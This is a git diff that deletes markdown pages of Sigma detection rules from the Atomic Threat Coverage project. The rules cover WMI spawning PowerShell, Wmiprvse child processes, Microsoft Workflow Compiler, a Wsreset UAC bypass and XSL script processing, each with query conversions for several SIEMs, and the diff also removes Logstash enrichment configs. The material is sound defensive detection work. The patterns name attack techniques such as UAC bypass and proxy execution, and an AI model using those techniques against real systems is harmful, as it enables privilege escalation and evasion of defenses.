-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>AppvClient</li><li>CCM</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shell_spawn_susp_program.yml](https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shell_spawn_susp_program.yml)</li><li>[https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e](https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e)</li></ul>  |
-| **Author**               | Markus Neis / @Karneades |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WMI Spawning Windows PowerShell
-id: 692f0bec-83ba-4d04-af7e-e884a96059b6
-status: experimental
-description: Detects WMI spawning PowerShell
-references:
-    - https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shell_spawn_susp_program.yml
-    - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
-author: Markus Neis / @Karneades
-date: 2019/04/03
-tags:
-    - attack.execution
-    - attack.defense_evasion
-    - attack.t1064
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage:
-            - '*\wmiprvse.exe'
-        Image:
-            - '*\powershell.exe'
-    condition: selection
-falsepositives:
-    - AppvClient
-    - CCM
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\wmiprvse.exe") -and ($_.message -match "Image.*.*\\powershell.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:(*\\wmiprvse.exe) AND winlog.event_data.Image.keyword:(*\\powershell.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/692f0bec-83ba-4d04-af7e-e884a96059b6 <<EOF
-{
-  "metadata": {
-    "title": "WMI Spawning Windows PowerShell",
-    "description": "Detects WMI spawning PowerShell",
-    "tags": [
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.t1064",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\wmiprvse.exe) AND winlog.event_data.Image.keyword:(*\\\\powershell.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\wmiprvse.exe) AND winlog.event_data.Image.keyword:(*\\\\powershell.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WMI Spawning Windows PowerShell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:(*\\wmiprvse.exe) AND Image.keyword:(*\\powershell.exe))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\wmiprvse.exe") (Image="*\\powershell.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage IN ["*\\wmiprvse.exe"] Image IN ["*\\powershell.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\wmiprvse\.exe))(?=.*(?:.*.*\powershell\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_wmiprvse_spawning_process.md b/Atomic_Threat_Coverage/Detection_Rules/win_wmiprvse_spawning_process.md
deleted file mode 100644
index 6c83a8a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_wmiprvse_spawning_process.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Wmiprvse Spawning Process       |
-|:-------------------------|:------------------|
-| **Description**          | Detects wmiprvse spawning processes |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1047_windows_management_instrumentation/wmi_win32_process_create_remote.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1047_windows_management_instrumentation/wmi_win32_process_create_remote.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Wmiprvse Spawning Process
-id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
-description: Detects wmiprvse spawning processes
-status: experimental
-date: 2019/08/15
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1047_windows_management_instrumentation/wmi_win32_process_create_remote.md
-tags:
-    - attack.execution
-    - attack.t1047
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage|endswith: '\WmiPrvSe.exe'
-    filter:
-        - LogonId: '0x3e7'  # LUID 999 for SYSTEM
-        - Username: 'NT AUTHORITY\SYSTEM'  # if we don't have LogonId data, fallback on username detection
-    condition: selection and not filter
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\WmiPrvSe.exe" -and  -not ($_.message -match "LogonId.*0x3e7" -or $_.message -match "Username.*NT AUTHORITY\\SYSTEM")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\WmiPrvSe.exe AND (NOT (LogonId:"0x3e7" OR Username:"NT\ AUTHORITY\\SYSTEM")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d21374ff-f574-44a7-9998-4a8c8bf33d7d <<EOF
-{
-  "metadata": {
-    "title": "Wmiprvse Spawning Process",
-    "description": "Detects wmiprvse spawning processes",
-    "tags": [
-      "attack.execution",
-      "attack.t1047"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\WmiPrvSe.exe AND (NOT (LogonId:\"0x3e7\" OR Username:\"NT\\ AUTHORITY\\\\SYSTEM\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\WmiPrvSe.exe AND (NOT (LogonId:\"0x3e7\" OR Username:\"NT\\ AUTHORITY\\\\SYSTEM\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Wmiprvse Spawning Process'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\WmiPrvSe.exe AND (NOT (LogonId:"0x3e7" OR Username:"NT AUTHORITY\\SYSTEM")))
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\WmiPrvSe.exe" NOT (LogonId="0x3e7" OR Username="NT AUTHORITY\\SYSTEM"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\WmiPrvSe.exe"  -(LogonId="0x3e7" OR Username="NT AUTHORITY\\SYSTEM"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\WmiPrvSe\.exe)(?=.*(?!.*(?:.*(?:.*(?=.*0x3e7)|.*(?=.*NT AUTHORITY\SYSTEM))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_workflow_compiler.md b/Atomic_Threat_Coverage/Detection_Rules/win_workflow_compiler.md
deleted file mode 100644
index 28bfc7f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_workflow_compiler.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Microsoft Workflow Compiler       |
-|:-------------------------|:------------------|
-| **Description**          | Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1127: Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate MWC use (unlikely in modern enterprise environments)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb](https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb)</li></ul>  |
-| **Author**               | Nik Seetharaman |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Microsoft Workflow Compiler
-id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d
-status: experimental
-description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1127
-author: Nik Seetharaman
-date: 2019/01/16
-references:
-    - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\Microsoft.Workflow.Compiler.exe'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Legitimate MWC use (unlikely in modern enterprise environments)
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\Microsoft.Workflow.Compiler.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:*\\Microsoft.Workflow.Compiler.exe
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/419dbf2b-8a9b-4bea-bf99-7544b050ec8d <<EOF
-{
-  "metadata": {
-    "title": "Microsoft Workflow Compiler",
-    "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1127"
-    ],
-    "query": "winlog.event_data.Image.keyword:*\\\\Microsoft.Workflow.Compiler.exe"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:*\\\\Microsoft.Workflow.Compiler.exe",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Microsoft Workflow Compiler'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:*\\Microsoft.Workflow.Compiler.exe
-```
-
-
-### splunk
-    
-```
-Image="*\\Microsoft.Workflow.Compiler.exe" | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\Microsoft.Workflow.Compiler.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\Microsoft\.Workflow\.Compiler\.exe'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_wsreset_uac_bypass.md b/Atomic_Threat_Coverage/Detection_Rules/win_wsreset_uac_bypass.md
deleted file mode 100644
index 87a688f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_wsreset_uac_bypass.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Wsreset UAC Bypass       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a method that uses Wsreset.exe tool that can be used to reset the Windows Store to bypass UAC |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1088: Bypass User Account Control](https://attack.mitre.org/techniques/T1088)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown sub processes of Wsreset.exe</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://lolbas-project.github.io/lolbas/Binaries/Wsreset/](https://lolbas-project.github.io/lolbas/Binaries/Wsreset/)</li><li>[https://www.activecyber.us/activelabs/windows-uac-bypass](https://www.activecyber.us/activelabs/windows-uac-bypass)</li><li>[https://twitter.com/ReaQta/status/1222548288731217921](https://twitter.com/ReaQta/status/1222548288731217921)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1548.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Wsreset UAC Bypass
-id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae
-status: experimental
-description: Detects a method that uses Wsreset.exe tool that can be used to reset the Windows Store to bypass UAC
-references:
-    - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/
-    - https://www.activecyber.us/activelabs/windows-uac-bypass
-    - https://twitter.com/ReaQta/status/1222548288731217921
-author: Florian Roth
-date: 2020/01/30
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1088
-    - attack.t1548.002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage|endswith:
-            - '\WSreset.exe'
-    condition: selection
-fields:
-    - CommandLine
-falsepositives:
-    - Unknown sub processes of Wsreset.exe
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\WSreset.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.ParentImage.keyword:(*\\WSreset.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae <<EOF
-{
-  "metadata": {
-    "title": "Wsreset UAC Bypass",
-    "description": "Detects a method that uses Wsreset.exe tool that can be used to reset the Windows Store to bypass UAC",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1088",
-      "attack.t1548.002"
-    ],
-    "query": "winlog.event_data.ParentImage.keyword:(*\\\\WSreset.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.ParentImage.keyword:(*\\\\WSreset.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Wsreset UAC Bypass'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nCommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-ParentImage.keyword:(*\\WSreset.exe)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\WSreset.exe") | table CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage IN ["*\\WSreset.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\WSreset\.exe)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_xsl_script_processing.md b/Atomic_Threat_Coverage/Detection_Rules/win_xsl_script_processing.md
deleted file mode 100644
index b19de76..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_xsl_script_processing.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | XSL Script Processing       |
-|:-------------------------|:------------------|
-| **Description**          | Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files, rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1220: XSL Script Processing](https://attack.mitre.org/techniques/T1220)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1220: XSL Script Processing](../Triggers/T1220.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>WMIC.exe FP depend on scripts and administrative methods used in the monitored environment</li><li>msxsl.exe is not installed by default so unlikely.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: XSL Script Processing
-id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d
-status: experimental
-description: Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files, rule detects when adversaries
-    abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses
-author: Timur Zinniatullin, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.yaml
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-      - Image|endswith: '\wmic.exe'
-        CommandLine|contains: '/format' # wmic process list /FORMAT /?
-      - Image|endswith: '\msxsl.exe'
-    condition: selection
-falsepositives:
-    - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment
-    - msxsl.exe is not installed by default so unlikely.
-level: medium
-tags:
-    - attack.execution
-    - attack.t1220
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\wmic.exe" -and $_.message -match "CommandLine.*.*/format.*") -or $_.message -match "Image.*.*\\msxsl.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\wmic.exe AND winlog.event_data.CommandLine.keyword:*\/format*) OR winlog.event_data.Image.keyword:*\\msxsl.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/05c36dd6-79d6-4a9a-97da-3db20298ab2d <<EOF
-{
-  "metadata": {
-    "title": "XSL Script Processing",
-    "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files, rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses",
-    "tags": [
-      "attack.execution",
-      "attack.t1220"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.CommandLine.keyword:*\\/format*) OR winlog.event_data.Image.keyword:*\\\\msxsl.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.CommandLine.keyword:*\\/format*) OR winlog.event_data.Image.keyword:*\\\\msxsl.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'XSL Script Processing'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\wmic.exe AND CommandLine.keyword:*\/format*) OR Image.keyword:*\\msxsl.exe)
-```
-
-
-### splunk
-    
-```
-((Image="*\\wmic.exe" CommandLine="*/format*") OR Image="*\\msxsl.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\wmic.exe" CommandLine="*/format*") OR Image="*\\msxsl.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\wmic\.exe)(?=.*.*/format.*))|.*.*\msxsl\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Enrichments/EN0001_cache_sysmon_event_id_1_info.md b/Atomic_Threat_Coverage/Enrichments/EN0001_cache_sysmon_event_id_1_info.md
deleted file mode 100644
index ed313e7..0000000
--- a/Atomic_Threat_Coverage/Enrichments/EN0001_cache_sysmon_event_id_1_info.md
+++ /dev/null
@@ -1,36 +0,0 @@
-| Title              | EN0001_cache_sysmon_event_id_1_info |
-|:-------------------|:-----------------------------------------------------------------------------------------------------------------|
-| **Description**    | Cache Sysmon Event ID 1 (Process Create) data for further enrichments. |
-| **Data Needed**    |<ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul> |
-| **Data to enrich** | None |
-| **References**     |<ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li></ul> |
-| **Author**         | Teymur Kheirkhabarov           |
-| **Requirements**   | None |
-| **New fields**     | None |
-
-
-### Config
-
-We can use Logstash to cache data in Memcached. 
-Here is the config example:
-
-```
-filter {
-  # Building information block for caching:
-  if [source_name] == "Microsoft-Windows-Sysmon" and [event_id] == 1 {
-    mutate {
-      add_field => {
-        "[@metadata][processinfo]" => "IntegrityLevel=%{[event_data][IntegrityLevel]},User=%{[event_data][User]},CommandLine=${[event_data][CommandLine]},ParentImage=%{[event_data][ParentImage]}"
-      }
-    }
-    # Saving previously built information block in cache (key is concatenation of ProcessGuid and computer_name):
-    memcached {
-      hosts => ["127.0.0.1:11211"]
-      set => {
-        "[@metadata][processinfo]" => "%{computer_name}_{[event_data][ProcessGuid]}"
-      }
-      ttl => 86400 # 24 hours
-    }
-  }
-}
-```
diff --git a/Atomic_Threat_Coverage/Enrichments/EN0002_enrich_sysmon_event_id_1_with_parent_info.md b/Atomic_Threat_Coverage/Enrichments/EN0002_enrich_sysmon_event_id_1_with_parent_info.md
deleted file mode 100644
index e3894cd..0000000
--- a/Atomic_Threat_Coverage/Enrichments/EN0002_enrich_sysmon_event_id_1_with_parent_info.md
+++ /dev/null
@@ -1,46 +0,0 @@
-| Title              | EN0002_enrich_sysmon_event_id_1_with_parent_info |
-|:-------------------|:-----------------------------------------------------------------------------------------------------------------|
-| **Description**    | Enrich Sysmon Event ID 1 (Process Create) with Parent Integrity Level,  Parent User and Parent of Parent Image fields. |
-| **Data Needed**    |<ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul> |
-| **Data to enrich** |<ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul> |
-| **References**     |<ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li></ul> |
-| **Author**         | Teymur Kheirkhabarov           |
-| **Requirements**   |<ul><li>[EN0001_cache_sysmon_event_id_1_info](../Enrichments/EN0001_cache_sysmon_event_id_1_info.md)</li></ul>> |
